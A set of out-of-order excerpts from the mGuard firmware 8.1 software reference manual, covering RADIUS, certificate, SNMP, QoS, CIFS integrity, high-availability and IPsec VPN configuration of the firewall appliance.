Software Reference Manual mGuard Firmware 8.1
Contents
1. [105661_en_02] Via VPN: If Yes is selected, the mGuard authentication query is always sent via an encrypted VPN tunnel if a suitable one is available. If No is selected, a query of this type is always sent unencrypted outside the VPN. If Yes has been selected under Via VPN, then the mGuard supports queries from a RADIUS server through its VPN connection. This happens automatically whenever the RADIUS server belongs to the remote network of a configured VPN tunnel and the mGuard has an internal IP address belonging to the local network of the same VPN tunnel. This makes the authentication query dependent on the availability of a VPN tunnel. During configuration, ensure that the failure of a single VPN tunnel does not prevent administrative access to the mGuard. Port: The port number used by the RADIUS server. Secret: RADIUS server password. This password must be the same as on the mGuard. The mGuard uses this password to exchange messages with the RADIUS server and to encrypt the user password. The RADIUS server password is not transmitted in the network. The password is important for security, since the mGuard can be rendered vulnerable to attack at this point if passwords are too weak. We recommend a password with at least 32 characters and several special characters. It must be changed on a regular basis. If the RADIUS secret is discovered, an attacker can read the user password for the RADIUS authentication que
2. No users are logged in. 7.3 Authentication >> RADIUS: RADIUS Servers. [Screenshot: RADIUS Servers settings with RADIUS timeout 3 seconds, RADIUS retries 3, RADIUS NAS Identifier; two server entries radius.example.com, Via VPN No, port 1812, secret.] A RADIUS server is a central authentication server used by devices and services for checking user passwords. The password is not known to these devices and services. Only one or a number of RADIUS servers know the password. The RADIUS server also provides the device or service that a user wishes to access with further information about the user, e.g. the group to which the user belongs. In this way, all user settings can be managed centrally. In order to activate RADIUS authentication, Yes must be set under Authentication >> Firewall Users (Enable group authentication sub-item) and RADIUS selected as the Authentication Method. Under Authentication >> RADIUS Servers, a list of RADIUS servers used by the mGuard is generated. This list is also used when RADIUS authentication is activated for administrative access (SSH, HTTPS). (Innominate Security Technologies, mGuard 8.1, page 187.) When RADIUS authentication is active, the login attempt is forwarded from a non-predefined user (not root, admin, netadmin, audit or user) to all RADIUS servers listed here. The first response received by the mGuard from one of the RADIUS servers determines whether or not the authenticat
3. Provider defined (e.g. via PPPoE or DHCP): The domain name servers of the Internet service provider that provide access to the Internet are used. Only select this setting if the mGuard operates in PPPoE, PPTP or Modem mode, or in Router mode with DHCP. User defined (from field below): If this setting is selected, the mGuard will connect to the domain name servers listed under User defined name servers. Network >> DNS >> DNS server: User defined name servers: The IP addresses of domain name servers can be entered in this list. If these should be used by the mGuard, select the User defined (from field below) option under Servers to query. Local Resolving of Host Names: You can configure multiple entries with assignment pairs of host names and IP addresses for various domain names. You have the option to define, change (edit) and delete assignment pairs of host names and IP addresses. You can also activate or deactivate the resolution of host names for a domain. In addition, you can delete a domain with all its assignment pairs. Creating a table with assignment pairs for a domain: Open a new row and click on Edit in this row. Changing or deleting assignment pairs belonging to a domain: Click on Edit in the relevant table row. After clicking on Edit, the DNS Records tab page is displayed. DNS Records: Local Resolving of Hostnames: Domain
4. [Screenshot: Upload PKCS#12: Filename, Browse, Import, Password; Download Certificate.] Authentication >> Certificates >> Machine Certificates: Machine Certificates: Shows the currently imported X.509 certificates that the mGuard uses to authenticate itself to partners (e.g. other VPN gateways). Importing a new machine certificate: To import a new certificate, proceed as follows. Requirement: The PKCS#12 file (file name extension .p12 or .pfx) is saved on the connected computer. Proceed as follows: Click on Browse to select the file. In the Password field, enter the password used to protect the private key of the PKCS#12 file. Click on Import. Once imported, the loaded certificate appears under Certificate. Remember to save the imported certificate along with the other entries by clicking on the Apply button. Using the short name (Shortname): When importing a machine certificate, the CN attribute from the certificate subject field is suggested as the short name here, providing the Shortname field is empty at this point. This name can be adopted or another name can be chosen. A name must be assigned, whether it is the suggested one or another. Names must be unique and must not be assigned more than once. During the configuration of SSH (Management >> System Settings, Shell Access menu), HTTPS (M
5. An IP address. To specify an address area, use CIDR format (see CIDR (Classless Inter-Domain Routing) on page 24). 0.0.0.0/0 means all addresses. Interface (External, Internal, External 2, VPN, Dial-in): Specifies to which interface the rule should apply. If no rules are set, or if no rule applies, the following default settings apply: SNMP monitoring is permitted via Internal, VPN and Dial-in. Access via External and External 2 is refused. Specify the monitoring options according to your requirements. NOTE: If you want to refuse access via Internal, VPN or Dial-in, you must implement this explicitly by means of corresponding firewall rules, for example by specifying Drop as an action. To prevent your own access being blocked, you may have to permit access simultaneously via another interface explicitly with Accept before clicking on the Apply button to activate the new setting. Otherwise, if your access is blocked, you must carry out the recovery procedure. Management >> SNMP >> Query: Action: Accept means that the data packets may pass through. Reject means that the data packets are sent back and the sender is informed of their rejection. In Stealth mode, Reject has the same effect as Drop. Drop means that the data packets are not permitted to pass through. They are discarded, which means that the sender is not
6. No: an e-mail is not sent to the address specified below. Only with faults and deviations: an e-mail is sent to the address specified below if a deviation is detected during CIFS integrity checking or if the check could not be carried out due to an access error. An e-mail is sent to this address either after every check or only if a deviation is detected during CIFS integrity checking or if the check could not be carried out due to an access error. Text entered in the subject field of the e-mail. CIFS Integrity Monitoring >> CIFS Integrity Checking >> Settings: Checking of Shares: State: No check is currently being performed. The share check has been suspended. A drive check is currently in progress. An integrity database is currently being created. The share has not yet been checked. Probably no integrity database exists. Last check finished successfully. The process failed due to an unforeseen condition; please consult the logs. Last check was aborted due to timeout. The integrity database is missing or incomplete. The signature of the integrity database is invalid. The integrity database was created with a different hash algorithm. The integrity database is the wrong version. The share which is to be checked is not available. The share which is to be used as checksum memory is not available.
7. nal switch: Packages mguard api_0 mbin action switch reset phy counters. Port: Name of the Ethernet connection to which the row refers. tx collisions: Number of errors while sending the data. tx octets: Data volume sent. Network >> Ethernet >> MAU settings: rx fcs errors: Number of received frames with invalid checksum. rx good octets: Volume of the valid data received. 6.2.2 Multicast (only available with the mGuard rs4000 3G). [Screenshot: Network >> Ethernet >> MAU settings >> Multicast: Static Multicast Groups table with entry 01:00:5e:00:00:00 and all four ports set to Yes; General Multicast Configuration: IGMP Snooping Yes, IGMP Snoop Aging 300, IGMP Query off, IGMP Query Interval 120, Multicast Groups Update Interval 10 s.] Network >> Ethernet >> Multicast: Static Multicast Groups: Multicast is a technology which enables data to be sent to a group of recipients without the transmitter having to send it multiple times. The data replication takes place through the distributor within the network. You can create a list of multicast addresses. The data is forwarded to the configured ports (LAN1 to LAN4). General Multicast Configuration: IGMP snooping: The switch uses IGMP snooping to guarantee that multicast data is only forwarded via ports which are intended for this use. IGMP Snoop Aging: Per
8. specified in kbps or packets per second. In order to optimize prioritization, the total bandwidth specified here should be slightly lower than the actual amount. This prevents a buffer overrun on the transferring devices, which would result in adverse effects. Queues: Name: The default name for the egress queue can be adopted or another can be assigned. The name does not specify the priority level. Guaranteed: Bandwidth that should be available at all times for the relevant queue. Based on the selection under Bandwidth Rate Limit (kbps OR Packet/s), meaning that the unit of measurement does not have to be specified explicitly here. The total of all guaranteed bandwidths must be less than or equal to the total bandwidth. QoS menu >> Egress Queues >> Internal, External, External 2, Dial-in; QoS menu >> Egress Queues VPN >> VPN via Internal, VPN via External, VPN via External 2, VPN via Dial-in: Upper Limit: Maximum bandwidth available that may be set for the relevant queue by the system. Based on the selection under Bandwidth Rate Limit (kbps OR Packet/s), meaning that the unit of measurement does not have to be specified explicitly here. The value must be greater than or equal to the guaranteed bandwidth. The value unlimited can also be specified, which means that there is no further restriction. Priority (Low, Medium, High): Specifies with
9. Authentication menu: 7.4.2 Machine Certificates: The mGuard authenticates itself to the partner using a machine certificate loaded on the mGuard. The machine certificate acts as an ID card for the mGuard, which it shows to the relevant partner. For a more detailed explanation, see Authentication >> Certificates on page 190. By importing a PKCS#12 file, the mGuard is provided with a private key and the corresponding machine certificate. Multiple PKCS#12 files can be loaded on the mGuard, enabling the mGuard to show the desired self-signed or CA-signed machine certificate to the partner for various connections. In order to use the machine certificate installed at this point, it must be referenced additionally during the configuration of applications (SSH, VPN) so that it can be used for the relevant connection or remote access type. Example of imported machine certificates: [Screenshot: Authentication >> Certificates, tabs Certificate settings, Machine Certificates, CA Certificates, Remote Certificates, CRL; one Machine Certificates entry with Subject CN=VPN Endpunkt Kundendienst, L=KS, O=Beispiel Lieferant, C=DE; Subject Alternative Names; Issuer CN=VPN SubCA 01, O=Beispiel Lieferant, C=DE; Validity from Mar 20 18:37:57 2007 GMT to Mar 20 18:37:57 2010 GMT; MD5 and SHA1 fingerprints; Shortname VPN Endpunkt Kundendienst KS.]
10. 5.2 Blade Control >> Blade 01 to 12: These pages display the status information for each installed mGuard device and enable the configuration of the relevant mGuard device to be backed up and restored. 5.2.1 Blade in slot: [Screenshot: Blade Control >> Blade 03 >> Blade in slot 03, Configuration; Overview: Device type blade, ID bus controller ID 0x22 0x3 0x1 0x1, Serial number 27500087, Flash ID 000c00034100692f, Software version 7.4.1 default, MAC addresses 00:0c:be:02:0e:f0, 00:0c:be:02:0e:f1, 00:0c:be:02:0e:f2, 00:0c:be:02:0e:f3; Status, LAN link status, WAN link status, Temperature N/A.] Blade Control >> Blade xx >> Blade in slot xx: Overview: Device type: Device name, e.g. blade or blade XL. ID bus controller ID: ID of this slot on the control bus of the bladebase. Serial number: Serial number of the mGuard. Flash ID: Flash ID of the flash memory of the mGuard. Software version: Version of the software installed on the mGuard. MAC addresses: All MAC addresses used by the mGuard. Status: mGuard status. LAN status: Status of the LAN port. WAN link status: Status of the WAN port. Temperature: N/A (Not available). Blade Control menu: 5.2.2 Configuration: [Screenshot: Blade Control >> Blade 01 >> Blade in slot 01, Configuration: No configuration file; Configuration backup; Blade 01 > Controller.] Reconfiguration if Bla
11. Advanced on page 216), complex connections of this type are tracked. In this case, the administrator only needs to create a firewall rule on the mGuard which allows the client to establish a control channel to the FTP server. The mGuard enables the server to establish a data channel automatically, regardless of whether the firewall rules allow for this. The tracking of complex connections is part of the firewall state synchronization process. However, to keep the latency short, the mGuard forwards the network packets independently from the firewall state synchronization update that has been triggered by the network packets themselves. Therefore, it may be the case for a very brief period that a state change for the complex connection is not forwarded to the mGuard on standby if the active mGuard fails. In this case, tracking of the connection from the mGuard which is active after the fail-over is not continued correctly. This cannot be corrected by the mGuard. The data link is then reset or interrupted. Fail-over when establishing semi-unidirectional connections: A semi-unidirectional connection refers to a single IP connection, such as UDP connections, where the data only travels in one direction after the connection is established with a bidirectional handshake. The data flows from the responder to the initiator. The initiator only sends data packets at the very start. The following applies only to certain protocols which
12. Firewall rules for web access to the mGuard via HTTPS (Management >> Web Settings >> Access menu): Log ID fw-https-access. Firewall rules for access to the mGuard via SNMP (Management >> SNMP >> Query menu): Log ID fw-snmp-access. Firewall rules for SSH remote access to the mGuard (Management >> System Settings >> Shell Access menu): Log ID fw-ssh-access. Firewall rules for the user firewall (Network Security >> User Firewall menu, Firewall rules): Log ID ufw. Rules for NAT, port forwarding (Network >> NAT >> IP and Port Forwarding menu): Log ID fw-portforwarding. Firewall rules for the serial interface (Network >> Interfaces >> Dial-in menu): Incoming Rules: Log ID fw-serial-incoming; Outgoing Rules: Log ID fw-serial-outgoing. General messages: When activating a configuration profile on a blade. When retrieving a configuration profile from a blade. Logging menu: Searching for firewall rules on the basis of a network security log: If the Network Security checkbox is enabled so that the relevant log entries are displayed, the Jump to firewall rule search field is displayed below the Reload logs button. Proceed as follows if you want to trace the firewall rule referenced by a log entry in the Network Security category and which resulted in the corresponding event: 1. Select the
13. Gateway indicates the IP addresses of the communicating VPN gateways. Traffic refers to the computers and networks that communicate via the VPN gateways. Refers to the subject of an X.509 certificate. ISAKMP State (Internet Security Association and Key Management Protocol) is set to established if both VPN gateways involved have established a channel for key exchange. In this case, they have been able to contact one another and all entries up to and including ISAKMP SA on the connection configuration page are correct. IPsec State is set to established if IPsec encryption is activated for communication. In this case, the data under IPsec SA and Tunnel Settings is also correct. In the event of problems, it is recommended that you check the VPN logs of the partner to which the connection was established. This is because detailed error messages are not forwarded to the initiating computer for security reasons. If displayed: ISAKMP SA established, IPsec State WAITING: This means that authentication was successful, but the other parameters did not match. Does the connection type (tunnel, transport) correspond? If Tunnel is selected, do the network areas match on both sides? IPsec State: IPsec SA established: The VPN connection is established successfully and can be used. However, if this is not p
14. Management menu: X.509 Authentication: X.509 certificates for SSH clients: The mGuard supports the authentication of SSH clients using X.509 certificates. It is sufficient to configure CA certificates that are required for the establishment and validity check of a certificate chain. This certificate chain must exist between the CA certificate on the mGuard and the X.509 certificate shown to the SSH client (see Shell Access on page 40). If the validity period of the client certificate is checked by the mGuard (see Certificate settings on page 195), new CA certificates must be configured on the mGuard at some point. This must take place before the SSH clients use their new client certificates. If the CRL check is activated under Authentication >> Certificates >> Certificate settings, one URL where the corresponding CRL is available must be maintained for each CA certificate. The URL and CRL must be published before the mGuard uses the CA certificates in order to confirm the validity of the certificates shown by the VPN partners. [Screenshot: Enable X.509 certificates for SSH access: Yes; SSH server certificate; CA certificates SSH RootCA 01 and SSH SubCA 01; X.509 subject with Authorized for access as (e.g. CN/OU Admin mapped to admin); Client certificate with Authorized for access as (two client certificates mapped to root).] Management >> System Settings >> Shell Acces
15. Management of the mGuard via HTTPS (see Management >> Web Settings on page 56, Access on page 57). Certificates can be used to identify (authenticate) oneself to others. The certificate used by the mGuard to identify itself to others shall be referred to as the machine certificate here, in line with Microsoft Windows terminology. A certificate specific to an individual (or user certificate; a certificate showing a person) is one used by operators to authenticate themselves to partners, e.g. an operator attempting to access the mGuard via HTTPS and a web browser for the purpose of remote configuration. A certificate specific to an individual can also be saved on a chip card and then inserted by its owner in the card reader of their computer when prompted by a web browser during establishment of the connection, for example. Remote certificate, CA Certificates: Authentication menu: A certificate is thus used by its owner (person or machine) as a form of ID in order to verify that they really are the individual they identify themselves as. As there are at least two communication partners, the process takes place alternately: partner A shows their certificate to partner B, partner B then shows their certificate to partner A. Provision is made for the following so that A can accept the certificate shown by B, i.e. the certificate of i
16. Power supply 1/2: State of both power supply units (only mGuard rs4000/rs2000 3G, mGuard rs4000/rs2000, mGuard centerport, mGuard industrial rs, mGuard smart, mGuard pci SD, mGuard pcie SD, mGuard delta, EAGLE mGuard). System Temperature (°C): An SNMP trap is triggered if the temperature exceeds or falls below the specified temperature range (only mGuard centerport, not with firmware 7.6.0). CPU temperature (°C): An SNMP trap is triggered if the temperature exceeds or falls below the specified temperature range. Management >> System Settings >> Host: System DNS Hostname: Hostname mode, Host name, Domain search path: You can assign a name to the mGuard using the Hostname mode and Hostname fields. This name is then displayed, for example, when logging in via SSH (see Management >> System Settings on page 33, Shell Access on page 40). Assigning names simplifies the administration of multiple mGuard devices. User defined (from field below) (Default): The name entered in the Hostname field is the name used for the mGuard. If the mGuard is running in Stealth mode, the User defined option must be selected under Hostname mode. Provider defined (e.g. via DHCP): If the selected network mode permits external setting of the host name (e.g. via DHCP), the name supplied by the provider is assigned to the mGuard.
17. VPN connections which have been started via a text message, switch button, nph-vpn.cgi or the web interface are aborted once this time has elapsed. Only available with the mGuard rs4000/rs2000 3G: Incoming text messages can be used to start or stop VPN connections. The text message must contain the command vpn start or vpn stop followed by the token. Yes/No (default: No): If the TCP Encapsulation function is used (see TCP Encapsulation on page 250), only set this option to Yes if the mGuard is to encapsulate its own outgoing data traffic for the VPN connection it initiated. In this case, the number of the port where the partner receives the encapsulated data packets must also be specified. When Yes is selected, the mGuard will not attempt to establish the VPN connection using standard IKE encryption (UDP port 500 and 4500). Instead, the connection is always encapsulated using TCP. Default: 8080. Number of the port where the encapsulated data packets are received by the partner. The port number specified here must be the same as the one specified for the mGuard of the partner under TCP port to listen on (IPsec VPN >> Global >> Options menu item). If TCP Encapsulation is used (see page 250): If the mGuard is to establish a VPN connection to a maintenance center and encapsulate the data traffic there, Initiate or Initiate on traffic must be specified. If the mGuard is installed a
18. [Screenshot residue: egress queue rule tables. External 2 settings for egress queue rules (QoS >> Egress Rules >> External 2) and Dial-in settings for egress queue rules (QoS >> Egress Rules >> Dial-in), each with a Default Queue and three default rules: Protocol All, From IP 0.0.0.0/0, From Port any, To IP 0.0.0.0/0, To Port any, Current TOS/DSCP TOS Minimize Delay, New TOS/DSCP Unchanged, Queue Urgent; TOS Maximize Reliability, Unchanged, Important; TOS Minimize Cost, Unchanged, Low Priority.] 12.4.2 Egress Rules VPN: VPN via Internal, VPN via External, VPN via External 2, VPN via Dial-in. [Screenshot residue: VPN via Internal settings for egress queue rules (QoS >> Egress Rules VPN >> VPN via Internal, VPN via External, VPN via External 2, VPN via Dial-in), Default Rules table with columns Protocol, From IP, From Port, To IP, To Port, Current TOS/DSCP, New TOS/DSCP, Queue Name, Comment.]
19. Management >> Web Settings >> Access: Action: Accept means that the data packets may pass through. Reject means that the data packets are sent back and the sender is informed of their rejection. In Stealth mode, Reject has the same effect as Drop. Drop means that the data packets are not permitted to pass through. They are discarded, which means that the sender is not informed of their whereabouts. Comment: Freely selectable comment for this rule. Log: For each individual firewall rule, you can specify whether the use of the rule should be logged (set Log to Yes) or should not be logged (set Log to No, default setting). RADIUS Authentication: Enable RADIUS authentication (this menu item is not included in the scope of functions for the mGuard rs2000 3G, mGuard rs2000): If set to No, the passwords of users who log in via HTTPS are checked via the local database. The User authentication method can only be set to Login restricted to X.509 client certificate if No is selected. Select Yes to enable users to be authenticated via the RADIUS server. The password is only checked locally in the case of predefined users (root, admin, netadmin, audit and user). The netadmin and audit authorization levels relate to access rights with the mGuard device manager. You should only select As only method for password authentication
20. A file could not be read due to an I/O failure. Please consult the report. The directory tree could not be traversed due to an I/O failure. Please consult the report. The signature has not yet been checked. The signature is valid. Enabled: No: a check is not triggered for this network drive. The mGuard has not connected this drive. The status cannot be viewed. Yes: a check is triggered regularly for this network drive. Suspended: the check has been suspended until further notice. The status can be viewed. Checked CIFS Share: Name of the network drive to be checked, specified under CIFS Integrity Monitoring >> Importable Shares >> Edit. Checksum Memory: In order to perform the check, the mGuard must be provided with a network drive for storing the files. The checksum memory can be accessed via the external network interface. Action: Click on Edit to make further settings for checking network drives. CIFS Integrity Monitoring menu: [Screenshot: CIFS Integrity Monitoring >> CIFS Integrity Checking >> Checked Share >> Management: Settings: Enabled Yes; Checked CIFS Share (Mounted and usable); Patterns for filenames; Time Schedule Continuous; Maximum time a check may take 180 m.] Please note: No regular check will happen unless the system time of the mGuard has been set, either manually or with the help of NTP. Please note: If a check is still run
21. Default gateway in the main building: IP address of default gateway 192.168.1.253. mGuard basics: 1.2.6 Resolving network conflicts. [Figure: Resolving network conflicts.] In the example, the networks on the right-hand side should be accessible to the network or computer on the left-hand side. However, for historical or technical reasons, the networks on the right-hand side overlap. The 1:1 NAT feature of the mGuard can be used to translate these networks to other networks, thereby resolving the conflict. 1:1 NAT can be used in normal routing and in IPsec tunnels. 2 Configuration help: 2.1 Suitable browsers: The device can be configured easily using a web browser. To configure the mGuard, use a web browser with SSL encryption (HTTPS). Browsers with SSL encryption (HTTPS) approved by Innominate: Mozilla Firefox Version 4 or later; Google Chrome Version 12 or later; Microsoft Internet Explorer Version 8 or later; Apple Safari Version 5.1.7 or later. Further information can be found on the Innominate website at www.innominate
22. IPsec VPN >> Connections >> Edit >> General: Local, Remote for Tunnel connection type: Define the network areas for both tunnel ends under Local and Remote. [Figure: IPsec tunnel between the Local VPN gateway (Network Local) and the Remote VPN gateway (Network Remote).] Type: Tunnel. No NAT / 1:1 NAT / Masquerade: It is possible to translate the IP addresses of devices located at the respective end of the VPN tunnel. No NAT: NAT is not performed. Local: Here, specify the address of the network or computer which is connected locally to the mGuard. [Screenshot: Type Tunnel, Local 1:1 NAT; table with Local 192.168.1.1/32, Remote 192.166.254.1/32, Action 1:1 NAT, 1:1 NAT 192.168.2.1.] With 1:1 NAT, the IP addresses of devices at the local end of the tunnel are exchanged so that each individual address is translated into another specific address. It is not translated into an IP address that is identical for all devices, as is the case with Masquerading. If local devices transmit data packets, only those data packets are considered which are actually encrypted by the mGuard (the mGuard only forwards packets via the VPN tunnel if they originate from a trustworthy source), originate from a source address within the network which is defined here, and have their destination address in the network of the partner if 1:1 NAT is no
23. If the User defined option is selected under Hostname mode, enter the name that should be assigned to the mGuard here. Otherwise, this entry will be ignored, i.e. if the Provider defined option (e.g. via DHCP) is selected under Hostname mode. This option makes it easier for the user to enter a domain name. If the user enters the domain name in an abbreviated form, the mGuard completes the entry by appending the domain suffix that is defined here under Domain search path. SNMP Information: System name: A name that can be freely assigned to the mGuard for administration purposes, e.g. Hermes, Pluto (under SNMP: sysName). Location: A description of the installation location that can be freely assigned, e.g. Hall IV, Corridor 3, Control cabinet (under SNMP: sysLocation). Contact: The name of the contact person responsible for the mGuard, ideally including the phone number (under SNMP: sysContact). Keyboard (only mGuard centerport): [Screenshot: Keyboard Layout qwertz/de-latin1-nodeadkeys, Repetition Rate 30, Repetition Delay 250.] Keyboard Layout: Selection list for selecting the appropriate keyboard layout. Repetition Rate: Determines how many characters the keyboard generates per second when a key is held down (Default: 30). Repetition Delay: Determines how long a key must be held down on the keyboard until the repeat fu
24. Often the IP addresses of partner VPN gateways must be requested from the DynDNS service, or they must be kept up to date by new queries. Sporadically, the mGuard is configured so that SNMP traps are sent to the remote server. Sporadically, the mGuard is configured to permit and accept remote access via HTTPS, SSH or SNMP. The mGuard then sends reply packets to every IP address from which an access attempt is made, if the firewall rules permit this access. Often the mGuard is configured to connect to an HTTPS server at regular intervals in order to download any configuration profiles available there (see Management >> Central Management on page 91). When No is selected, the mGuard establishes a telephone connection using the connected modem as soon as possible after a restart or activation of Modem network mode. This remains permanently in place, regardless of whether or not data is transmitted. If the telephone connection is then interrupted, the mGuard attempts to restore it immediately. Thus a permanent connection is created, like a permanent line. By doing this, the mGuard is constantly available externally, i.e. for incoming data packets. Network >> Interfaces >> Dial-out: Idle timeout, Idle time (Seconds), Local IP, Remote IP, Netmask. Network menu: Yes/No: Only considered when Dial on demand is set to Ye
25. The configuration on the external storage medium also contains the passwords for the root, admin, netadmin, audit and user users. These passwords are also loaded when loading from an external storage medium. The netadmin and audit authorization levels relate to access rights with the mGuard device manager.

4.5 Management >> SNMP

The mGuard must not be simultaneously configured via web access, shell access or SNMP. Simultaneous configuration via the different access methods might lead to unexpected results.

4.5.1 Query

(Screenshot, Management >> SNMP >> Query: Enable SNMPv3 access: Yes; Enable SNMPv1/v2 access: Yes; ... connections: 161; Run SNMP Agent under the permissions of the following user: admin; SNMPv1/v2 Read-Write Community: private, Read-Only Community: public; Allowed Networks (Log ID fw-snmp-access): From IP 10.0.0.0/8, Interface External, Action Accept.)

The SNMP (Simple Network Management Protocol) is mainly used in more complex networks to monitor the state and operation of devices. SNMP is available in several releases: SNMPv1, SNMPv2 and SNMPv3. The older versions (SNMPv1, SNMPv2) do not use encryption and are not considered to be secure. The use of SNMPv1/SNMPv2 is therefore not recommended. SNMPv3 is significantly better in terms of security, but not all management consoles support this version yet. Inn
26. (Screenshot, Network Security >> Packet Filter >> DMZ. DMZ -> WAN (Log ID fw-dmz-outgoing-wan): Protocol All, From IP 0.0.0.0/0, From Port any, To IP 0.0.0.0/0, To Port any, Action Accept, Log Yes; Log entries for unknown connection attempts. LAN -> DMZ (Log ID fw-dmz-outgoing-lan): Protocol TCP, From IP 0.0.0.0/0, From Port any, To IP 0.0.0.0/0, To Port any, Action Accept, Log Yes; Log entries for unknown connection attempts.)

Network Security >> Packet Filter >> DMZ: Firewall rules for DMZ
WAN -> DMZ: Default: the data packets of all incoming connections are rejected.
DMZ -> LAN: Default: the data packets of all incoming connections are rejected.
DMZ -> WAN: Default: the data packets of all outgoing connections are allowed.
LAN -> DMZ: Default: the data packets of all outgoing connections are allowed.
Protocol: All means TCP, UDP, ICMP, GRE and other IP protocols.
From IP / To IP: 0.0.0.0/0 means all IP addresses. To specify an address area, use CIDR format (see CIDR (Classless Inter-Domain Routing) on page 24).
From Port / To Port (also: Action, Comment, Log, Log entries for unknown connection attempts): Only evaluated for TCP and UDP protoc
27. ham vic INFO disabled IP forwarding and other conditions
ham ac ext AC INFO ham ac 3417 eth0 listening to CARP messages
ham ac syncif AC INFO ham ac 3432 eth2 listening to CARP messages
ham ac int AC INFO ham ac 3399 eth1 listening to CARP messages
ham vic INFO disabled virtual interface eth0 vif
ham vic INFO disabled virtual interface eth1 vif
ham vic INFO disabled ARP daemon 0
ham ssv INFO transitioned to state outdated
ham ssv INFO transitioned to state on_standby
ham vic INFO enabled IP forwarding and other conditions
ham ssv INFO transitioned to state becomes_active
ham ac syncif AC INFO ham ac 3432 eth2 sending CARP messages and listening to them
ham ac ext AC INFO ham ac 3417 eth0 sending CARP messages and listening to them
ham ac int AC INFO ham ac 3399 eth1 sending CARP messages and listening to them
ham ssv INFO sigalrm timeout
ham ssv INFO transitioned to state active
ham vic INFO enabled virtual interface eth0 vif
ham vic INFO enabled virtual interface eth1 vif
ham vic INFO enabled ARP daemon 0
ham vsr INFO terminating
ham vsr INFO ham vsr 3459 terminated
ham fsr INFO terminating
ham fsr INFO ham fsr 3453 terminated
ham ssv WARN call read func receive report line 444 errno 104 Connection reset by
ham ssv WARN call read func receive report line 444 errno 104 Connection reset by
ham ssv INFO transitioned to state active
28. ...nected to the control center. The mGuard can then be called by a remote partner if this partner has been dynamically assigned its IP address by the Internet service provider, i.e. it has an IP address that changes. In this scenario, you may only specify an IP address if the remote calling partner also has a fixed and known IP address.

%any can only be used together with the authentication method using X.509 certificates. If locally stored CA certificates are to be used to authenticate the partner, the address of the VPN gateway of the partner can be specified explicitly by means of an IP address or host name, or by %any. If it is specified using an explicit address and not by %any, then a VPN identifier (see VPN Identifier on page 272) must be specified.

%any must be selected if the partner is located downstream of a NAT gateway. Otherwise the renegotiation of new connection keys will fail on initial contact.

If TCP Encapsulation is used (see TCP Encapsulation on page 250), a fixed IP address or a host name must be specified if this mGuard is to initiate the VPN connection and encapsulate the VPN data traffic. If this mGuard is installed upstream of a maintenance center to which multiple remote mGuard devices establish VPN connections and transmit encapsulated data packets, %any must be specified for the VPN gateway of the partner.
29. 1:1 NAT (only in Router network mode)
Port forwarding (not in Stealth network mode)
Individual firewall rules for different users (user firewall)
Individual rule sets as action target of firewall rules (apart from user firewall or VPN firewall)
CIFS integrity check of network drives for changes to specific file types (e.g. executable files)
Anti-virus scan connector, which supports central monitoring of network drives with virus scanners

VPN features
Protocol: IPsec (tunnel and transport mode)
IPsec encryption in hardware with DES (56 bits), 3DES (168 bits) and AES (128, 192, 256 bits)
Packet authentication: MD5, SHA-1
Internet Key Exchange (IKE) with main and quick mode
Authentication via: Pre-shared key (PSK); X.509v3 certificates with public key infrastructure (PKI) with certification authority (CA), optional certificate revocation list (CRL) and the option of filtering by subject; or Partner certificate (e.g. self-signed certificates)
Detection of changing partner IP addresses via DynDNS
NAT traversal (NAT-T)
Dead Peer Detection (DPD): detection of IPsec connection aborts
IPsec/L2TP server: connection of IPsec/L2TP clients
IPsec firewall and 1:1 NAT
Default route over VPN tunnel
Data forwarding between VPNs (hub and spoke)
Depending on the license, up to 250 VPN channels; in the case of mGuard centerport
30. ...2 bytes of address area (256 x 256). There can be 32 x 256 x 256 Class C networks, and each of these networks can have up to 256 hosts (1 byte of address area).

Subnet mask: Normally a company network with access to the Internet is only officially assigned a single IP address, e.g. 123.456.789.21. The first byte of this example address indicates that this company network is a Class B network; in other words, the last two bytes are free to be used for host addressing. Accordingly, an address area for up to 65,536 possible hosts (256 x 256) can be computed. Such a huge network is not practical and generates a need for subnetworks to be built. The subnet mask is used here. Like an IP address, the mask is 4 bytes long. The bytes representing the network address are each assigned the value 255. The primary purpose of doing this is to enable a portion of the host address area to be borrowed and used for addressing subnetworks. For example, if the subnet mask 255.255.255.0 is used on a Class B network (2 bytes for the network address, 2 bytes for the host address), the third byte, which was actually intended for host addressing, can now be used for subnetwork addressing. This computes to potential support for 256 subnetworks, each with 256 hosts.

IP security (IPsec) is a standard that uses encryption to verify the authenticity of the sender and to ensure the confidentiality and integrity of the data in IP datagrams (see Datagram on page
31. Authentication using the corresponding remote certificate
• Select the following entry from the selection list: No CA certificate, but the Remote Certificate below.
• Install the remote certificate under Remote Certificate (see Installing the remote certificate on page 271).
It is not possible to reference a remote certificate loaded under the Authentication >> Certificates menu item.

Installing the remote certificate
The remote certificate must be configured if the VPN partner is to be authenticated using a remote certificate. To import a certificate, proceed as follows.
Requirement: The certificate file (file name extension .pem, .cer or .crt) is saved on the connected computer.
• Click on Browse to select the file.
• Click on Upload.
The contents of the certificate file are then displayed.

IPsec VPN >> Connections >> Edit >> Authentication
VPN Identifier: Authentication method: CA certificate. The following explanation applies if the VPN partner is authenticated using CA certificates. VPN gateways use the VPN identifier to detect which configurations belong to the same VPN connection. If the mGuard consults CA certificates to authenticate a VPN partner, then it is possible to use the VPN identifier as a filter.
• Make a corresponding entry in the Remote field.
Local / Remote:
32. For additional information about the table, see Authentication >> Certificates on page 190.

Authentication for VPN
The partner shows the following:              Machine certificate signed by CA                                                        | Machine certificate, self-signed
The mGuard authenticates the partner using:   Remote certificate, or all CA certificates that form the chain to the root CA certificate together with the certificate shown by the partner | Remote certificate

According to this table, the certificates that must be provided are the ones the mGuard uses to authenticate the relevant VPN partner. The following instructions assume that the certificates have already been correctly installed on the mGuard (see Authentication >> Certificates on page 190), apart from the remote certificate.

If the use of revocation lists (CRL checking) is activated under the Authentication >> Certificates, Certificate settings menu item, each certificate signed by a CA that is shown by the VPN partner is checked for revocations. This excludes locally configured (imported) remote certificates.

IPsec VPN menu: Remote CA Certificate
If the VPN partner authenticates itself with a self-signed machine certificate:
• Select the following entry from the selection list: No CA certificate, but the Remot
33. In both cases, the connection to the Internet service provider (and therefore the Internet) is established via the telephone network using a modem or ISDN terminal adapter. In Modem network mode, the serial interface of the mGuard is not available for the PPP dial-in option or for configuration purposes (see Modem/Console on page 139). After selecting Modem as the network mode, specify the required parameters for the modem connection on the Dial-out and/or Dial-in tab pages (see Dial-out on page 130 and Dial-in on page 136). Enter the connection settings for an external modem on the Modem/Console tab page (see Modem/Console on page 139). The configuration of the internal networks is described in the next section.

